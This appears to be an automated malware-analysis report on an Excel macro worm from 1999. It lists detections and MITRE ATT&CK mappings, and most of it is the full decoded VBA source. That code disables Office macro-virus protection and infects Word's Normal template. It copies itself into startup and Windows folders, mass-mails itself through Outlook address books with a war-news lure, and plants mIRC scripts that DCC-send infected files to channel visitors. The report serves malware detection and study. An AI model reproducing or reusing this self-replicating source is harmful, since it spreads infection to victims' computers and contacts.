MALICIOUS
Risk Score: 396
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a macro-enabled Excel file containing VBA code that exhibits self-replication and worm-like behavior. It attempts to create directories, modifies Excel settings, and uses VBA functions like CreateObject and GetObject, indicative of malicious intent. The VBA code explicitly mentions 'Primeiro Excel Virus Brasileiro Para Excel97 e Email e MIRC' and includes functionality to harvest recipients from the MAPI address book and send itself as an email attachment, aligning with spearphishing attachment tactics.
Heuristics (9)
- ClamAV: Xls.Trojan.War-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Trojan.War-1
- VBA macros detected [medium, 7 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: NT.DeleteLines 1, NT.CountOfLines
- VBA email-worm self-replication (Outlook mass-mailer) [critical] OLE_VBA_EMAIL_WORM_SELF_REPLICATION: VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvesting recipients from the MAPI address book / inbox, attaching a file to the outgoing message, and sending the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature.
  Matched line in script: Set alevirusscs = oa.CreateItem(0)
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
  Matched line in script: Set WordObj = CreateObject("Word.Application")
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
  Matched line in script: Set WordObj = GetObject(, "Word.Application")
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Open macro [low] OLE_VBA_AUTO: Auto_Open macro
  Matched line in script: Sub Auto_Open()
- Auto_Close macro [low] OLE_VBA_AUTOCLOSE: Auto_Close macro
  Matched line in script: Sub Auto_Close()
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11406 bytes |

SHA-256: 3ad0a0bc52a89476de753c46b64b138aecb604cad131c05ca9556783fd99ae2d
Detection: ClamAV: Xls.Trojan.War-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = 0
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0
If Tudo() Then
GoTo SejaGay:
Else
NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
Tudo = True
End If
Next y
End If
Next x
End Function
Function NoOlho()
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
Windows("ALEVIRUSCS.XLM").Visible = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function
Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
Amerda = True
End If
Next y
End Function
Sub Puta()
oactivebook = ActiveWorkbook.Name
If Amerda() Then
GoTo cya
Else
End If
Application.ScreenUpdating = False
Application.Windows("ALEVIRUSCS.XLM").Visible = True
Workbooks("ALEVIRUSCS.XLM").Activate
Sheets("Email").Visible = True
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Email").Visible = False
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub
Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 5, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 6, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 7, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 8, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 9, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 10, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 11, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 12, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 13, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 14, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 15, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 16, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 17, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 18, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 19, "End Sub"
WordObj.Run "Normal.ThisDocument.AutoExec"
End If
Set NT = Nothing
If Quit = True Then WordObj.Quit
End Sub
Private Sub Email()
On Error Resume Next
Application.EnableCancelKey = 0
Randomize
Set oa = CreateObject("Outlook.Application")
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
Set mn = oa.GetNameSpace("MAPI")
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
If oa = "Outlook" Then
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
mn.Logon "profile", "password"
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
For y = 1 To mn.AddressLists.Count
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
x = 1
Set ab = mn.AddressLists(y)
Set alevirusscs = oa.CreateItem(0)
For z = 1 To ab.AddressEntries.Count
vi = ab.AddressEntries(x)
alevirusscs.Recipients.Add vi
x = x + 1
If x > 60 Then z = ab.AddressEntries.Count
Next z
alevirusscs.Subject = "Fwd: Millions DEADS!!!"
alevirusscs.Body = "Urgent info inside. The III War is Begin!!! Read The Secret's in XLS!"
alevirusscs.Attachments.Add ActiveWorkbook.FullName
alevirusscs.Send
vi = ""
Next y
mn.Logoff
End If
End Sub
Private Sub Dia()
If Day(Now()) = 19 And Month(Now()) = 5 Then
Assistant.Visible = True
With Assistant.NewBalloon
.Animation = msoAnimationGetAttentionMajor
.Heading = "Atenção:"
.Text = "Primeiro Excel97>Email>MIRC> Virus Brasileiro by AlevirusSCS [Brasil]1999!Em Breve Alevirus Excel97 Formula Virus!Mande-me Um EMAIL!fernanda88@hotmail.com"
.Icon = msoIconAlert
.Show
End With
End If
End Sub
Private Sub Mirc()
On Error Resume Next
Open "c:\mirc\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\war3.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja40\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\sexo.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja41\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\fone.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja38\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\avp.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja37\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\mirc40\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\fone.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\mirc41\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\avp.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\dusk\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\darkskie\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\war3.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\darksk~1\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\sexo.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\matchbox\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\hell31s\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\avala8\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\nep\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\nep45\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
End Sub
Sub ViewVBCode()
MsgBox "Este programa executou uma instrucao ilegal por favor feche o Windows e reinicie.", vbCritical, "Microsoft Word"
End Sub